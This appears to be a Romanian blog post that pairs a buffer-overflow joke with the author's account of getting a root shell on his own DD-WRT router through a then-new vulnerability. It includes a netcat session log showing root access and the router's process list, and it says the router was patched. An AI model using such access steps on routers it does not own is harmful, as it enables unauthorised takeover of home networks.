A c-string walks into a bar. It says to the bartender,
“Can I have a beer and some fadsh543%$%lkjfdslfj/bin/sh”.
The bartender turns and says:
“Welcome root, You’ve got mail”
Via Bibi, care a auzit-o de la Eti. Bibi, ai inteles-o?
Later Edit:
Si cum tocmai a aparut o simpatica vulnerabilitate de dd-wrt, si eu am dd-wrt acasa, am reusit sa il sparg…
Chestia se potriveste de minune cu gluma de mai sus din pacate…
marius-perijocs-macbook:ddwrt mariusperijoc$ nc 192.168.1.1 5555
id
uid=0(root) gid=0(root)
whoami
root
ps ax
BusyBox v1.11.1 (2008-07-27 16:09:08 CEST) multi-call binary
Usage: ps
ps
PID USER      VSZ STAT COMMAND
1 root     1172 S   /sbin/init noinitrd
2 root        0 SW  [keventd]
3 root        0 RWN [ksoftirqd_CPU0]
4 root        0 SW  [kswapd]
5 root        0 SW  [bdflush]
6 root        0 SW  [kupdated]
10 root        0 SW  [mtdblockd]
14 root     1184 S   /sbin/watchdog
85 root     1164 S   resetbutton
129 root     1844 S   httpd -p 80
131 root      812 S   dnsmasq --conf-file=/tmp/dnsmasq.conf
230 root      700 S   cron
236 root     1532 S   dropbear -b /tmp/loginprompt -r /tmp/root/.ssh/ssh_ho
260 root     1164 S   process_monitor
380 root     1168 S   upnp -D -L br0 -W vlan1 -I 60 -A 180
482 root     1164 S   /sbin/wland
487 root     1168 S   ttraff
540 root        0 Z   [schedulerb.star]
544 root        0 Z   [wdswatchdog.sta]
759 root     1108 S   sh -c /tmp/exec.tmp>/tmp/shellout.asp
760 root     1104 S   /bin/sh /tmp/exec.tmp
762 root     1104 S   /bin/sh
768 root     1108 R   ps
^C
marius-perijocs-macbook:ddwrt mariusperijoc$
PS: L-am patchuit, deci nu va stresati, dar daca aveti prieteni cu dd-wrt’uri, anuntul oficial e undeva pe aici si fixul e aici.